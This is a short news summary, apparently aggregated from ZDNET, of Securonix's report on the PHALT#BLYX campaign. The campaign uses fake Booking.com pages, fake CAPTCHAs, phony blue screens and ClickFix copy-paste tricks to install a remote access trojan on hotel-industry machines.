"In a new malware campaign tracked by cybersecurity firm Securonix, attackers are using ClickFix social engineering, fake CAPTCHAs, and phony BSODs to convince victims into copying and pasting malicious code. Once executed, the code deploys a Russian-linked RAT (remote access trojan) that allows the criminals to remotely take over the PC and deploy additional malware. Aimed at the hotel and hospitality industry, the campaign dubbed PHALT#BLYX is described by Securonix as a multi-stage infection chain, as it takes its victims through a series of steps."
"The attack starts with a phishing email that contains a link to a fake website masquerading as online travel agency Booking.com. The email ostensibly includes a request to cancel a booking reservation to convince the recipient to engage with it. Selecting the link to the site displays a page with a fake CAPTCHA prompt that then triggers the phony BSOD. In this case, the recipient is told to fix the BSOD by copying and pasting a malicious script into the Windows run dialog box."
Attackers send phishing emails containing links to a fake Booking.com website that urges recipients to cancel a reservation. The fake site presents a CAPTCHA that triggers a faux Blue Screen of Death to alarm the user. The infection uses ClickFix social engineering to instruct victims to copy and paste a malicious script into the Windows Run dialog. The pasted script executes a PowerShell command that downloads an MSBuild project file named v.proj and disables Windows Defender. The payload is a Russian-linked remote access trojan that enables remote control, persistence, and deployment of additional malware. The campaign targets hotel and hospitality organizations.
Read at ZDNET
Unable to calculate read time
Collection
[
|
...
]